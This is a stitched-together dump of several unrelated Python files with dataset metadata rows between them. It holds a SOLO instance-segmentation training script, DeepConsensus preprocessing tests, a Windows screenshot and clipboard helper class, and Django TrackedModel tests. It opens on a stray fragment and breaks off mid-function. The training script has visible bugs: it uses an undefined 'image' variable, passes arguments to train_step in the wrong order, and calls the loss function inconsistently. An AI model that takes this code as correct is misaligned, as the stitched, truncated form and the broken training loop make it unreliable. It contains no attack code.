print("The path is invalid , please input a valid path.")
continue
| 37.722944 | 138 | 0.584118 | 968 | 8,714 | 5.054752 | 0.262397 | 0.031882 | 0.103004 | 0.102187 | 0.151441 | 0.123442 | 0.078479 | 0.060495 | 0.060495 | 0.042101 | 0 | 0.034179 | 0.271402 | 8,714 | 230 | 139 | 37.886957 | 0.736494 | 0.099036 | 0 | 0.265957 | 0 | 0 | 0.268352 | 0.08094 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021277 | false | 0 | 0.031915 | 0 | 0.053191 | 0.340426 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6525e20fd56f57771ac5fa7fed4aacac1e11f0bb | 11,933 | py | Python | train.py | quanghona/SOLO_tf2 | 4aab0fc9115d210f08e694ec59b5f093ade8ce91 | [
"MIT"
] | 8 | 2021-03-07T10:25:21.000Z | 2022-02-20T23:57:24.000Z | train.py | quanghona/SOLO_tf2 | 4aab0fc9115d210f08e694ec59b5f093ade8ce91 | [
"MIT"
] | null | null | null | train.py | quanghona/SOLO_tf2 | 4aab0fc9115d210f08e694ec59b5f093ade8ce91 | [
"MIT"
] | null | null | null | from model.model import SOLO
from train.loss import SOLOLoss
from data.tfrecord_decode import Parser
from config import *
import argparse
from datetime import datetime
import time
import os
import tensorflow as tf
from tensorflow.keras.utils import Progbar
tf.config.run_functions_eagerly(False) # for debugging
@tf.function
def train_step(model, loss_fn, optimizer, images, cat_true, mask_true, cat_metric, mask_metric):
with tf.GradientTape() as tape:
cat_pred, mask_pred = model(image, training=True)
total_loss, l_cate, l_mask = loss_fn((cat_true, mask_true), (cat_pred, mask_pred))
gradients = tape.gradient(total_loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
cat_metric.update_state(cat_true, cat_pred)
mask_metric.update_state(mask_true, mask_pred)
return total_loss, l_cate, l_mask
@tf.function
def test_step(model, loss_fn, images, cat_true, mask_true, cat_metric, mask_metric):
cat_pred, mask_pred = model(image, training=False)
total_loss, l_cate, l_mask = loss_fn(cat_true, mask_true, cat_pred, mask_pred)
cat_metric.update_state(cat_true, cat_pred)
mask_metric.update_state(mask_true, mask_pred)
return total_loss, l_cate, l_mask
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='SOLO network training script')
parser.add_argument("--dataset_train", type=str,
help="path to training dataset tfrecord BASE path")
parser.add_argument("--dataset_val", type=str,
help="path to validation dataset tfrecord BASE path")
args = parser.parse_args()
print("Training SOLO network")
display_config("train")
# Load model
model = SOLO(**MODEL_HYPERPARAMETERS)
# add weight decay
for layer in model.layers:
if isinstance(layer, tf.keras.layers.Conv2D) or isinstance(layer, tf.keras.layers.Dense):
layer.add_loss(lambda: tf.keras.regularizers.l2(TRAINING_PARAMETERS['weight_decay'])(layer.kernel))
if hasattr(layer, 'bias_regularizer') and layer.use_bias:
layer.add_loss(lambda: tf.keras.regularizers.l2(TRAINING_PARAMETERS['weight_decay'])(layer.bias))
# Training scheme
lr_schedule = tf.keras.optimizers.schedules.PiecewiseConstantDecay(boundaries=tf.math.multiply(TRAINING_PARAMETERS['epochs'], TRAINING_PARAMETERS['steps_per_epoch']),
values=tf.constant(TRAINING_PARAMETERS['learning_rates']))
optimizer = tf.keras.optimizers.SGD(learning_rate=lr_schedule, momentum=TRAINING_PARAMETERS['momentum'])
loss_fn = SOLOLoss()
# Load data
train_parser = Parser(MODEL_HYPERPARAMETERS['input_size'],
MODEL_HYPERPARAMETERS['grid_sizes'][0],
MODEL_HYPERPARAMETERS['num_class'],
mode='train')
val_parser = Parser(MODEL_HYPERPARAMETERS['input_size'],
MODEL_HYPERPARAMETERS['grid_sizes'][0],
MODEL_HYPERPARAMETERS['num_class'],
mode='val')
train_dataset = train_parser.build_dataset(args.dataset_train,
batch_size=TRAINING_PARAMETERS['batch_size'],
num_epoch=TRAINING_PARAMETERS['num_epoch'])
val_dataset = val_parser.build_dataset(args.dataset_val)
"""Training using built-in method
tb_callback = tf.keras.callbacks.TensorBoard(log_dir=os.path.join('logs', model.model_name), update_freq='batch')
ckpt_callback = tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join('weights', model.model_name, 'weight_' + model.model_name + '.h5'),
save_best_only=True,
save_weights_only=True)
model.compile(optimizer=optimizer,
loss=[loss_fn.get_category_loss(), loss_fn.get_mask_loss()],
loss_weights=loss_fn.weights,
metrics=[tf.keras.metrics.CategoricalAccuracy(),
tf.keras.metrics.MeanIoU(num_classes=MODEL_HYPERPARAMETERS['num_class'])])
model.fit(x=train_dataset,
batch_size=TRAINING_PARAMETERS['batch_size'],
epochs=TRAINING_PARAMETERS['num_epoch'],
shuffle=True,
steps_per_epoch=TRAINING_PARAMETERS['steps_per_epoch'],
validation_data=val_dataset,
validation_batch_size=TRAINING_PARAMETERS['batch_size'],
verbose=1,
callbacks=[tb_callback, ckpt_callback])
"""
# Training using low-level API
# Load/create Checkpoint
ckpt = tf.train.Checkpoint(step=tf.Variable(-1, trainable=False, dtype=tf.int64),
optimizer=optimizer,
model=model,
metric=tf.Variable(1000, trainable=False, dtype=tf.float32))
manager = tf.train.CheckpointManager(ckpt, os.path.join('checkpoints', model.model_name), max_to_keep=5)
ckpt.restore(manager.latest_checkpoint)
if manager.latest_checkpoint:
print("Restored from {}".format(manager.latest_checkpoint))
else:
print("Initializing from scratch.")
# Define Losses
train_loss = tf.keras.metrics.Mean(name='train_loss', dtype=tf.float32)
train_cat_loss = tf.keras.metrics.Mean(name='train_cat_loss', dtype=tf.float32)
train_mask_loss = tf.keras.metrics.Mean(name='train_mask_loss', dtype=tf.float32)
val_loss = tf.keras.metrics.Mean(name='val_loss', dtype=tf.float32)
val_cat_loss = tf.keras.metrics.Mean(name='val_cat_loss', dtype=tf.float32)
val_mask_loss = tf.keras.metrics.Mean(name='val_mask_loss', dtype=tf.float32)
# Define metrics
train_acc = tf.keras.metrics.CategoricalAccuracy(name='train_acc', dtype=tf.float32)
train_meaniou = tf.keras.metrics.MeanIoU(num_classes=2, name='train_meaniou', dtype=tf.float32)
val_acc = tf.keras.metrics.CategoricalAccuracy(name='val_acc', dtype=tf.float32)
val_meaniou = tf.keras.metrics.MeanIoU(num_classes=2, name='val_meaniou', dtype=tf.float32)
# Create logger
log_dir = os.path.join('logs', model.model_name, datetime.now().strftime("%Y%m%d%H%M%S"))
summary_writer = tf.summary.create_file_writer(log_dir)
step = ckpt.step.numpy()
val_metric = ckpt.metric.numpy()
total_val_sample = 5000
progbar = None
start_time = time.perf_counter()
# Start training
for image, cat_true, mask_true in train_dataset:
ckpt.step.assign_add(1)
step += 1
# On epoch start
epoch_step = (step % TRAINING_PARAMETERS['steps_per_epoch']) + 1
if epoch_step == 1:
print("Epoch {}/{}".format((step // TRAINING_PARAMETERS['steps_per_epoch']) + 1, TRAINING_PARAMETERS['num_epoch']))
progbar = Progbar(TRAINING_PARAMETERS['steps_per_epoch'], interval=1, stateful_metrics=['train_acc', 'train_meaniou'])
total_loss, l_cate, l_mask = train_step(model,
optimizer,
loss_fn,
image,
cat_true,
mask_true,
train_acc,
train_meaniou)
values = [('train_loss', total_loss),
('train_cat_loss', l_cate),
('train_mask_loss', l_mask),
('train_acc', train_acc.result()),
('train_meaniou', train_meaniou.result())]
progbar.update(epoch_step, values)
train_loss.update_state(total_loss)
train_cat_loss.update_state(l_cate)
train_mask_loss.update_state(l_mask)
with summary_writer.as_default():
tf.summary.scalar('train loss', train_loss.result(), step=step)
tf.summary.scalar('train category loss', train_cat_loss.result(), step=step)
tf.summary.scalar('train mask loss', train_mask_loss.result(), step=step)
tf.summary.scalar('train accuracy', train_acc.result(), step=step)
tf.summary.scalar('train mean IoU', train_meaniou.result(), step=step)
# On epoch end
if epoch_step == TRAINING_PARAMETERS['steps_per_epoch']:
# Save checkpoint (weights, optimizer states)
save_path = manager.save()
print("Saved checkpoint: {}. Loss: {:1.2f}, acc: {:1.2f}, meanIoU: {:1.2f}".format(save_path, train_loss.result(), train_acc.result(), train_meaniou.result()))
# Validation
print("Start validation...")
val_progbar = Progbar(total_val_sample, interval=1, stateful_metrics=['val_acc', 'val_meaniou'])
val_step = 0
for image, cat_true, mask_true in val_dataset:
val_step += 1
total_loss, l_cate, l_mask = test_step(model,
loss_fn,
image,
cat_true,
mask_true,
val_acc,
val_meaniou)
values = [('val_loss', total_loss),
('val_cat_loss', l_cate),
('val_mask_loss', l_mask),
('val_acc', val_acc.result()),
('val_meaniou', val_meaniou.result())]
progbar.update(val_step, values)
val_loss.update_state(total_loss)
val_cat_loss.update_state(l_cate)
val_mask_loss.update_state(l_mask)
with summary_writer.as_default():
tf.summary.scalar('validation loss', val_loss.result(), step=step)
tf.summary.scalar('validation category loss', val_cat_loss.result(), step=step)
tf.summary.scalar('validation mask loss', val_mask_loss.result(), step=step)
tf.summary.scalar('validation accuracy', val_acc.result(), step=step)
tf.summary.scalar('validation mean IoU', val_meaniou.result(), step=step)
# Save new best weight
new_metric = (val_acc.result() + val_meaniou.result()) / 2
if val_metric < new_metric:
val_metric = new_metric
ckpt.metric.assign(new_metric)
weight_path = os.path.join('weights', model.model_name, 'weight_{}_{}_{}_{}_{}_{}_{}_{}.h5'.format(model.model_name, model.num_class, model.input_size, '_'.join([str(i) for i in model.grid_sizes]), model.head_style, model.head_depth, model.fpn_channel, new_metric))
print("Val acc: {}, Val meaniou: {}. Saving weight to {}...".format(val_acc.result(), val_meaniou.result(), weight_path))
model.save_weights(weight_path)
total_val_sample = val_step
# Reset metrics state
train_loss.reset_states()
train_cat_loss.reset_states()
train_mask_loss.reset_states()
val_loss.reset_states()
val_cat_loss.reset_states()
val_mask_loss.reset_states()
train_acc.reset_states()
val_acc.reset_states()
train_meaniou.reset_states()
val_meaniou.reset_states()
train_time = int(time.perf_counter() - start_time)
train_hour = train_time // 3600
train_time = train_time % 3600
train_minute = train_time // 60
train_second = train_time % 60
print("Total training time: {} h {} m {} s".format(train_hour, train_minute, train_second))
| 50.138655 | 281 | 0.611162 | 1,398 | 11,933 | 4.924177 | 0.168813 | 0.020337 | 0.024404 | 0.017432 | 0.418652 | 0.327716 | 0.270482 | 0.195962 | 0.147879 | 0.113887 | 0 | 0.0084 | 0.28174 | 11,933 | 237 | 282 | 50.350211 | 0.794773 | 0.025308 | 0 | 0.129412 | 0 | 0.005882 | 0.109998 | 0.003179 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011765 | false | 0 | 0.058824 | 0 | 0.082353 | 0.047059 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6526e9b541886c0d2f17f42eb68b3176092c3761 | 6,366 | py | Python | deepconsensus/preprocess/preprocess_test.py | pichuan/deepconsensus | f1413ee0802dd09fb5a4507983314935e32ab482 | [
"BSD-3-Clause"
] | 106 | 2021-09-01T02:59:16.000Z | 2022-03-30T17:28:42.000Z | deepconsensus/preprocess/preprocess_test.py | pichuan/deepconsensus | f1413ee0802dd09fb5a4507983314935e32ab482 | [
"BSD-3-Clause"
] | 25 | 2021-09-01T06:49:44.000Z | 2022-03-31T01:45:32.000Z | deepconsensus/preprocess/preprocess_test.py | pichuan/deepconsensus | f1413ee0802dd09fb5a4507983314935e32ab482 | [
"BSD-3-Clause"
] | 16 | 2021-09-01T05:08:24.000Z | 2022-03-31T01:47:04.000Z | # Copyright (c) 2021, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of Google Inc. nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for preprocess."""
import json
import os
from absl import flags
from absl.testing import absltest
from absl.testing import parameterized
import tensorflow as tf
from deepconsensus.preprocess import preprocess
from deepconsensus.preprocess import utils
from deepconsensus.utils.test_utils import deepconsensus_testdata
from absl import app
testdata = deepconsensus_testdata
FLAGS = flags.FLAGS
def load_summary(tmp_dir, path):
summary_path = os.path.join(tmp_dir, path)
return json.load(open(summary_path, 'r'))
def load_dataset(output, dataset):
# Load inference, train, eval, or test tfrecord.gz files.
tf_record = output.replace('@split', dataset)
dataset = tf.data.TFRecordDataset(tf_record, compression_type='GZIP')
examples = list(dataset.as_numpy_iterator())
return examples
def get_unique_zmws(examples):
zmws = []
for example in examples:
features = utils.tf_example_to_features_dict(example)
zmws.append(int(features['name'].split('/')[1]))
return len(set(zmws))
class PreprocessE2E(parameterized.TestCase):
@parameterized.parameters([0, 2])
def test_e2e_inference(self, n_cpus):
"""Tests preprocessing inference in both single and multiprocess mode."""
n_zmws = 3
FLAGS.subreads_to_ccs = testdata('human_1m/subreads_to_ccs.bam')
FLAGS.ccs_fasta = testdata('human_1m/ccs.fasta')
FLAGS.cpus = n_cpus
FLAGS.limit = n_zmws
tmp_dir = self.create_tempdir()
output = os.path.join(tmp_dir, 'tf-@split.tfrecord.gz')
FLAGS.output = output
preprocess.main([])
examples = load_dataset(output, 'inference')
features = utils.tf_example_to_features_dict(examples[0], inference=True)
# Check that window_pos incr. monotonically for each ZMW.
last_pos = -1
last_zmw = -1
for example in examples:
features = utils.tf_example_to_features_dict(example, inference=True)
zmw = int(features['name'].split('/')[1])
if zmw != last_zmw:
last_zmw = zmw
last_pos = -1
window_pos = int(features['window_pos'])
self.assertGreater(window_pos, last_pos)
last_zmw = zmw
last_pos = window_pos
summary = load_summary(tmp_dir, 'tf-summary.inference.json')
self.assertEqual(summary['n_zmw_pass'], n_zmws)
self.assertLen(examples, summary['n_examples'])
@parameterized.parameters([0, 2])
def test_e2e_train(self, n_cpus):
"""Tests preprocessing training in both single and multiprocess mode."""
n_zmws = 10
FLAGS.subreads_to_ccs = testdata('human_1m/subreads_to_ccs.bam')
FLAGS.ccs_fasta = testdata('human_1m/ccs.fasta')
FLAGS.truth_to_ccs = testdata('human_1m/truth_to_ccs.bam')
FLAGS.truth_bed = testdata('human_1m/truth.bed')
FLAGS.truth_split = testdata('human_1m/truth_split.tsv')
FLAGS.cpus = n_cpus
FLAGS.limit = n_zmws
tmp_dir = self.create_tempdir()
output = os.path.join(tmp_dir, 'tf-@split.tfrecord.gz')
FLAGS.output = output
preprocess.main([])
train_examples = load_dataset(output, 'train')
eval_examples = load_dataset(output, 'eval')
test_examples = load_dataset(output, 'test')
all_examples = train_examples + eval_examples + test_examples
# Check that window_pos incr. monotonically for each ZMW.
last_pos = -1
last_zmw = -1
for example in all_examples:
features = utils.tf_example_to_features_dict(example, inference=False)
zmw = int(features['name'].split('/')[1])
if zmw != last_zmw:
last_zmw = zmw
last_pos = -1
window_pos = int(features['window_pos'])
self.assertGreater(window_pos, last_pos)
last_zmw = zmw
last_pos = window_pos
summary = load_summary(tmp_dir, 'tf-summary.training.json')
# Total count
self.assertLen(all_examples, summary['n_examples'])
# Test ZMW counts match
n_zmw_train = get_unique_zmws(train_examples)
n_zmw_eval = get_unique_zmws(eval_examples)
n_zmw_test = get_unique_zmws(test_examples)
self.assertLessEqual(summary['n_zmw_pass'], n_zmws)
self.assertEqual(n_zmw_train + n_zmw_eval + n_zmw_test,
summary['n_zmw_pass'])
self.assertEqual(n_zmw_train, summary['n_zmw_train'])
self.assertEqual(n_zmw_eval, summary['n_zmw_eval'])
self.assertEqual(n_zmw_test, summary['n_zmw_test'])
# Test n example counts match
self.assertLen(train_examples, summary['n_examples_train'])
self.assertLen(eval_examples, summary['n_examples_eval'])
self.assertLen(test_examples, summary['n_examples_test'])
features = utils.tf_example_to_features_dict(train_examples[0])
self.assertIn('label', features)
self.assertIn('label/shape', features)
self.assertTrue(
(features['subreads'].shape == features['subreads/shape']).all())
if __name__ == '__main__':
absltest.main()
| 37.447059 | 82 | 0.729815 | 888 | 6,366 | 5.027027 | 0.262387 | 0.013441 | 0.023522 | 0.024642 | 0.401658 | 0.343638 | 0.335125 | 0.292563 | 0.276434 | 0.276434 | 0 | 0.006646 | 0.172793 | 6,366 | 169 | 83 | 37.668639 | 0.841056 | 0.294533 | 0 | 0.377358 | 0 | 0 | 0.110511 | 0.044114 | 0 | 0 | 0 | 0 | 0.150943 | 1 | 0.04717 | false | 0.028302 | 0.09434 | 0 | 0.179245 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6529fab5ce361cffaf4209bfa5e651702c309ffe | 2,661 | py | Python | simplerpa/core/action/ActionScreen.py | songofhawk/simplerpa | 69491f3e9a84c106921be972242d05c5e3db5849 | [
"MIT"
] | 1 | 2022-02-16T08:37:25.000Z | 2022-02-16T08:37:25.000Z | simplerpa/core/action/ActionScreen.py | songofhawk/simplerpa | 69491f3e9a84c106921be972242d05c5e3db5849 | [
"MIT"
] | null | null | null | simplerpa/core/action/ActionScreen.py | songofhawk/simplerpa | 69491f3e9a84c106921be972242d05c5e3db5849 | [
"MIT"
] | null | null | null | import win32api
import pyautogui as autogui
from simplerpa.core.action.ActionImage import ActionImage
import win32clipboard as clip
import win32con
from io import BytesIO
class ActionScreen:
@staticmethod
def change_resolution(params: tuple):
"""
改变屏幕分辨率
Args:
params (Tuple[int,int]): 指定分辨率的宽和高
Returns:
None
"""
(width, height) = params
dm = win32api.EnumDisplaySettings(None, 0)
dm.PelsWidth = width
dm.PelsHeight = height
dm.BitsPerPel = 32
dm.DisplayFixedOutput = 1 # 0:缺省; 1:居中; 2:拉伸
win32api.ChangeDisplaySettings(dm, 0)
@classmethod
def snapshot(cls, rect=None, to_clipboard=False):
"""
根据跟定的ScreenRect区域截图
Args:
rect: 遵从一般系统坐标系的矩形区域(左上角为0,0点), autogui和Pillow都适用
to_clipboard: 是否把截图copy到剪贴板
Returns:
返回PIL格式的指定区域截图
"""
screen_shot = autogui.screenshot()
ret_image = screen_shot
if rect is not None:
ret_image = screen_shot.crop(
(int(float(rect.left)), int(float(rect.top)), int(float(rect.right)), int(float(rect.bottom))))
if to_clipboard:
output = BytesIO()
ret_image.convert('RGB').save(output, 'BMP')
data = output.getvalue()[14:]
output.close()
clip.OpenClipboard()
clip.EmptyClipboard()
clip.SetClipboardData(win32con.CF_DIB, data)
clip.CloseClipboard()
return ret_image
@classmethod
def snapshot_cv(cls, rect):
"""
根据跟定的ScreenRect区域截图
Args:
rect: 遵从一般系统坐标系的矩形区域(左上角为0,0点), autogui和opencv都适用
Returns:
返回opencv格式的指定区域截图
"""
pil_image = cls.snapshot(rect)
return ActionImage.pil_to_cv(pil_image)
@classmethod
def snapshot_pil(cls, rect=None, to_clipboard=False):
return cls.snapshot(rect, to_clipboard)
@staticmethod
def pick_color(x, y):
"""
获取屏幕上指定位置像素的颜色
Args:
x: 指定位置x坐标
y: 指定位置y坐标
Returns:
List[int]: 长度为4的整形数组,分别用0~255之间的数字,表示R,G,B,A四个通道
"""
return autogui.pixel(x, y)
@staticmethod
def pixel_matches_color(x, y, color_tuple, tolerance=0):
"""
检查给定的颜色和屏幕上特定坐标点的颜色是否匹配
Args:
x: 指定位置x坐标
y: 指定位置y坐标
color_tuple (Tuple[int]): (R,G,B) 组成的颜色值
tolerance: 容忍度
Returns:
bool: 是否匹配
"""
return autogui.pixelMatchesColor(x, y, color_tuple, tolerance)
| 26.346535 | 111 | 0.573844 | 266 | 2,661 | 5.642857 | 0.443609 | 0.036642 | 0.031979 | 0.017322 | 0.154564 | 0.099933 | 0 | 0 | 0 | 0 | 0 | 0.018049 | 0.333709 | 2,661 | 100 | 112 | 26.61 | 0.828539 | 0.226982 | 0 | 0.130435 | 0 | 0 | 0.003446 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.130435 | 0.021739 | 0.391304 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652a65a674583107574e471d2edeacd1d14aeef3 | 15,403 | py | Python | common/tests/test_models.py | uktrade/tamato | 4ba2ffb25eea2887e4e081c81da7634cd7b4f9ca | [
"MIT"
] | 14 | 2020-03-25T11:11:29.000Z | 2022-03-08T20:41:33.000Z | common/tests/test_models.py | uktrade/tamato | 4ba2ffb25eea2887e4e081c81da7634cd7b4f9ca | [
"MIT"
] | 352 | 2020-03-25T10:42:09.000Z | 2022-03-30T15:32:26.000Z | common/tests/test_models.py | uktrade/tamato | 4ba2ffb25eea2887e4e081c81da7634cd7b4f9ca | [
"MIT"
] | 3 | 2020-08-06T12:22:41.000Z | 2022-01-16T11:51:12.000Z | from typing import List
from unittest.mock import patch
import pytest
from pytest_django.asserts import assertQuerysetEqual # noqa
import common.exceptions
from common.exceptions import NoIdentifyingValuesGivenError
from common.models import TrackedModel
from common.models.transactions import Transaction
from common.tests import factories
from common.tests import models
from common.tests.models import TestModel1
from common.tests.models import TestModel2
from common.tests.models import TestModel3
from common.validators import UpdateType
from footnotes.models import FootnoteType
from regulations.models import Group
from regulations.models import Regulation
pytestmark = pytest.mark.django_db
def generate_model_history(factory, number=5, **kwargs) -> List:
objects = []
kwargs["update_type"] = kwargs.get("update_type", UpdateType.CREATE)
current = factory.create(**kwargs)
objects.append(current)
kwargs["update_type"] = UpdateType.UPDATE
kwargs["version_group"] = kwargs.get("version_group", current.version_group)
for _ in range(number - 1):
current = factory.create(**kwargs)
objects.append(current)
return objects
def model_with_history(factory, date_ranges, **kwargs):
class Models:
"""
A convenient system to store tracked models.
Creates a number of historic models for both test model types.
Creates an active model for each test model type.
Then creates a number of future models for each type as well.
"""
all_models = generate_model_history(
factory, valid_between=date_ranges.earlier, **kwargs
)
active_model = factory.create(
valid_between=date_ranges.current, update_type=UpdateType.UPDATE, **kwargs
)
all_models.append(active_model)
all_models.extend(
generate_model_history(
factory,
valid_between=date_ranges.future,
update_type=UpdateType.UPDATE,
**kwargs,
),
)
return Models
@pytest.fixture
def model1_with_history(date_ranges):
return model_with_history(
factories.TestModel1Factory,
date_ranges,
version_group=factories.VersionGroupFactory.create(),
sid=1,
)
@pytest.fixture
def model2_with_history(date_ranges):
return model_with_history(
factories.TestModel2Factory,
date_ranges,
version_group=factories.VersionGroupFactory.create(),
custom_sid=1,
)
@pytest.fixture
def sample_model() -> models.TestModel1:
return factories.TestModel1Factory.create()
def test_get_current(model1_with_history, model2_with_history):
"""Ensure only the most recent records are fetched."""
latest_models = TrackedModel.objects.latest_approved()
assert latest_models.count() == 2
assert set(latest_models.values_list("pk", flat=True)) == {
model1_with_history.all_models[-1].pk,
model2_with_history.all_models[-1].pk,
}
def test_since_transaction(model1_with_history):
transaction = model1_with_history.active_model.transaction
assert TrackedModel.objects.since_transaction(transaction.id).count() == 5
def test_as_at(date_ranges):
"""Ensure only records active at a specific date are fetched."""
pks = {
factories.TestModel1Factory.create(valid_between=date_ranges.later).pk,
factories.TestModel1Factory.create(valid_between=date_ranges.later).pk,
}
queryset = TestModel1.objects.as_at(date_ranges.later.lower)
assert set(queryset.values_list("pk", flat=True)) == pks
def test_active(model1_with_history):
"""Ensure only the currently active records are fetched."""
queryset = TestModel1.objects.active()
assert set(queryset.values_list("pk", flat=True)) == {
model1_with_history.active_model.pk,
}
def test_get_version_raises_error():
"""Ensure that trying to get a specific version raises an error if no
identifiers given."""
with pytest.raises(NoIdentifyingValuesGivenError):
TestModel1.objects.get_versions()
with pytest.raises(NoIdentifyingValuesGivenError):
TestModel2.objects.get_versions(sid=1)
def test_get_current_version(model1_with_history):
"""Ensure getting the current version works with a standard sid
identifier."""
model = model1_with_history.active_model
assert TestModel1.objects.get_current_version(sid=model.sid) == model
def test_get_current_version_custom_identifier(model2_with_history):
"""Ensure getting the current version works with a custom identifier."""
model = model2_with_history.active_model
assert TestModel2.objects.get_current_version(custom_sid=model.custom_sid) == model
def test_get_latest_version(model1_with_history):
"""Ensure getting the latest version works with a standard sid
identifier."""
model = model1_with_history.all_models[-1]
assert TestModel1.objects.get_latest_version(sid=model.sid) == model
def test_get_latest_version_custom_identifier(model2_with_history):
"""Ensure getting the latest version works with a custom identifier."""
model = model2_with_history.all_models[-1]
assert TestModel2.objects.get_latest_version(custom_sid=model.custom_sid) == model
def test_get_first_version(model1_with_history):
"""Ensure getting the first version works with a standard sid identifier."""
model = model1_with_history.all_models[0]
assert TestModel1.objects.get_first_version(sid=model.sid) == model
def test_get_first_version_custom_identifier(model2_with_history):
"""Ensure getting the first version works with a custom identifier."""
model = model2_with_history.all_models[0]
assert TestModel2.objects.get_first_version(custom_sid=model.custom_sid) == model
def test_trackedmodel_can_attach_record_codes(workbasket):
tx = workbasket.new_transaction()
with tx:
# Note: regulation.Regulation implicitly creates a regulation.Group as well!
factories.RegulationFactory.create()
factories.FootnoteTypeFactory.create()
tracked_models = (
TrackedModel.objects.annotate_record_codes()
.select_related()
.filter(transaction=tx)
)
expected_models = [
(tx.pk, Group, "150", "00"),
(tx.pk, Regulation, "285", "00"),
(tx.pk, FootnoteType, "100", "00"),
]
assertQuerysetEqual(
tracked_models,
expected_models,
transform=lambda o: (
o.transaction.pk,
o.__class__,
o.record_code,
o.subrecord_code,
),
ordered=False,
)
def test_get_latest_relation_with_latest_links(
model1_with_history,
django_assert_num_queries,
):
"""Assert that using `.with_latest_links` should allow a TrackedModel to
retrieve the current version of a relation without any extra queries."""
oldest_link = model1_with_history.all_models[0]
latest_link = model1_with_history.all_models[-1]
factories.TestModel3Factory.create(linked_model=oldest_link)
with django_assert_num_queries(1):
instance = TestModel3.objects.all().with_latest_links()[0]
fetched_oldest_link = instance.linked_model
fetched_latest_link = instance.linked_model_current
assert oldest_link.pk == fetched_oldest_link.pk
assert latest_link.pk == fetched_latest_link.pk
def test_get_latest_relation_without_latest_links(
model1_with_history,
django_assert_num_queries,
):
"""
Assert that without using `.with_latest_link` requires a Tracked Model to
use 4 queries to get the current version of a relation.
Finding the current version of an object requires 4 queries:
- Get the originating object as a starting point (e.g. start = TrackedModel.objects.get(pk=1))
- Get the related object (e.g. related = start.link)
- Get the related objects version group (e.g. group = related.version_group)
- Get the current version (e.g. current = group.current_version)
"""
oldest_link = model1_with_history.all_models[0]
latest_link = model1_with_history.all_models[-1]
factories.TestModel3Factory.create(linked_model=oldest_link)
with django_assert_num_queries(4):
instance = TestModel3.objects.all().select_related("linked_model")[0]
fetched_oldest_link = instance.linked_model
fetched_latest_link = instance.linked_model_current
assert oldest_link == fetched_oldest_link
assert latest_link == fetched_latest_link
def test_get_taric_template(sample_model):
assert sample_model.get_taric_template() == "test_template"
def test_current_version(sample_model):
assert sample_model.current_version == sample_model
version_group = sample_model.version_group
version_group.current_version = None
version_group.save()
with pytest.raises(models.TestModel1.DoesNotExist):
sample_model.current_version
def test_save(sample_model):
assert sample_model.current_version == sample_model
with pytest.raises(common.exceptions.IllegalSaveError):
sample_model.name = "fails"
sample_model.save()
sample_model.name = "succeeds"
sample_model.save(force_write=True)
def test_new_draft_uses_passed_transaction(sample_model):
transaction_count = Transaction.objects.count()
new_transaction = sample_model.transaction.workbasket.new_transaction()
new_model = sample_model.new_version(
sample_model.transaction.workbasket,
transaction=new_transaction,
)
assert new_model.transaction == new_transaction
assert Transaction.objects.count() == transaction_count + 1
def test_identifying_fields(sample_model):
assert sample_model.get_identifying_fields() == {"sid": sample_model.sid}
def test_identifying_fields_unique(model1_with_history):
assert model1_with_history.active_model.identifying_fields_unique()
def test_identifying_fields_to_string(sample_model):
assert sample_model.identifying_fields_to_string() == f"sid={sample_model.sid}"
def test_current_as_of(sample_model):
transaction = factories.UnapprovedTransactionFactory.create()
with transaction:
unapproved_version = factories.TestModel1Factory.create(
sid=sample_model.sid,
version_group=sample_model.version_group,
)
